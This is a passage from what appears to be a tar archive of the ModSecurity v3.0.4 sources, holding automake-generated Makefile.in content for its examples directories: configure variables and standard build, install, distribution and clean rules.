LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ ACLOCAL_AMFLAGS = -I build SUBDIRS = \ multiprocess_c \ reading_logs_with_offset \ reading_logs_via_rule_message \ simple_example_using_c \ using_bodies_in_chunks pkginclude_HEADERS = \ reading_logs_via_rule_message/reading_logs_via_rule_message.h # make clean CLEANFILES = # make maintainer-clean MAINTAINERCLEANFILES = \ Makefile.in all: all-recursive .SUFFIXES: $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs install-pkgincludeHEADERS: $(pkginclude_HEADERS) @$(NORMAL_INSTALL) @list='$(pkginclude_HEADERS)'; test -n "$(pkgincludedir)" || list=; \ if test -n "$$list"; then \ echo " $(MKDIR_P) '$(DESTDIR)$(pkgincludedir)'"; \ $(MKDIR_P) "$(DESTDIR)$(pkgincludedir)" || exit 1; \ fi; \ for p in $$list; do \ if test -f "$$p"; then d=; else d="$(srcdir)/"; fi; \ echo "$$d$$p"; \ done | $(am__base_list) | \ while read files; do \ echo " $(INSTALL_HEADER) $$files '$(DESTDIR)$(pkgincludedir)'"; \ $(INSTALL_HEADER) $$files "$(DESTDIR)$(pkgincludedir)" || exit $$?; \ done uninstall-pkgincludeHEADERS: @$(NORMAL_UNINSTALL) @list='$(pkginclude_HEADERS)'; test -n "$(pkgincludedir)" || list=; \ files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \ dir='$(DESTDIR)$(pkgincludedir)'; $(am__uninstall_files_from_dir) # This directory's subdirectories are mostly independent; you can cd # into them and run 'make' without going through this Makefile. # To change the values of 'make' variables: instead of editing Makefiles, # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. $(am__recursive_targets): @fail=; \ if $(am__make_keepgoing); then \ failcom='fail=yes'; \ else \ failcom='exit 1'; \ fi; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ case "$@" in \ distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ *) list='$(SUBDIRS)' ;; \ esac; \ for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ local_target="$$target-am"; \ else \ local_target="$$target"; \ fi; \ ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done; \ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-recursive TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \ include_option=--etags-include; \ empty_fix=.; \ else \ include_option=--include; \ empty_fix=; \ fi; \ list='$(SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test ! -f $$subdir/TAGS || \ set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \ fi; \ done; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-recursive CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-recursive cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ $(am__make_dryrun) \ || test -d "$(distdir)/$$subdir" \ || $(MKDIR_P) "$(distdir)/$$subdir" \ || exit 1; \ dir1=$$subdir; dir2="$(distdir)/$$subdir"; \ $(am__relativize); \ new_distdir=$$reldir; \ dir1=$$subdir; dir2="$(top_distdir)"; \ $(am__relativize); \ new_top_distdir=$$reldir; \ echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \ echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \ ($(am__cd) $$subdir && \ $(MAKE) $(AM_MAKEFLAGS) \ top_distdir="$$new_top_distdir" \ distdir="$$new_distdir" \ am__remove_distdir=: \ am__skip_length_check=: \ am__skip_mode_fix=: \ distdir) \ || exit 1; \ fi; \ done check-am: all-am check: check-recursive all-am: Makefile $(HEADERS) installdirs: installdirs-recursive installdirs-am: for dir in "$(DESTDIR)$(pkgincludedir)"; do \ test -z "$$dir" || $(MKDIR_P) "$$dir"; \ done install: install-recursive install-exec: install-exec-recursive install-data: install-data-recursive uninstall: uninstall-recursive install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-recursive install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: -test -z "$(CLEANFILES)" || rm -f $(CLEANFILES) distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-recursive clean-am: clean-generic clean-libtool mostlyclean-am distclean: distclean-recursive -rm -f Makefile distclean-am: clean-am distclean-generic distclean-tags dvi: dvi-recursive dvi-am: html: html-recursive html-am: info: info-recursive info-am: install-data-am: install-pkgincludeHEADERS install-dvi: install-dvi-recursive install-dvi-am: install-exec-am: install-html: install-html-recursive install-html-am: install-info: install-info-recursive install-info-am: install-man: install-pdf: install-pdf-recursive install-pdf-am: install-ps: install-ps-recursive install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-recursive -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-recursive mostlyclean-am: mostlyclean-generic mostlyclean-libtool pdf: pdf-recursive pdf-am: ps: ps-recursive ps-am: uninstall-am: uninstall-pkgincludeHEADERS .MAKE: $(am__recursive_targets) install-am install-strip .PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am check \ check-am clean clean-generic clean-libtool cscopelist-am ctags \ ctags-am distclean distclean-generic distclean-libtool \ distclean-tags distdir dvi dvi-am html html-am info info-am \ install install-am install-data install-data-am install-dvi \ install-dvi-am install-exec install-exec-am install-html \ install-html-am install-info install-info-am install-man \ install-pdf install-pdf-am install-pkgincludeHEADERS \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs installdirs-am maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-generic \ mostlyclean-libtool pdf pdf-am ps ps-am tags tags-am uninstall \ uninstall-am uninstall-pkgincludeHEADERS .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/using_bodies_in_chunks/0000755000175000017500000000000013607066346023051 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/using_bodies_in_chunks/Makefile.in0000644000175000017500000006213213607066346025122 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ noinst_PROGRAMS = simple_request$(EXEEXT) subdir = examples/using_bodies_in_chunks ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = PROGRAMS = $(noinst_PROGRAMS) am_simple_request_OBJECTS = simple_request-simple_request.$(OBJEXT) simple_request_OBJECTS = $(am_simple_request_OBJECTS) am__DEPENDENCIES_1 = simple_request_DEPENDENCIES = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = simple_request_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX \ $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=link $(CXXLD) \ $(AM_CXXFLAGS) $(CXXFLAGS) $(simple_request_LDFLAGS) \ $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/simple_request-simple_request.Po am__mv = mv -f CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) LTCXXCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CXX) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CXXFLAGS) $(CXXFLAGS) AM_V_CXX = $(am__v_CXX_@AM_V@) am__v_CXX_ = $(am__v_CXX_@AM_DEFAULT_V@) am__v_CXX_0 = @echo " CXX " $@; am__v_CXX_1 = CXXLD = $(CXX) CXXLINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CXXLD = $(am__v_CXXLD_@AM_V@) am__v_CXXLD_ = $(am__v_CXXLD_@AM_DEFAULT_V@) am__v_CXXLD_0 = @echo " CXXLD " $@; am__v_CXXLD_1 = SOURCES = $(simple_request_SOURCES) DIST_SOURCES = $(simple_request_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = 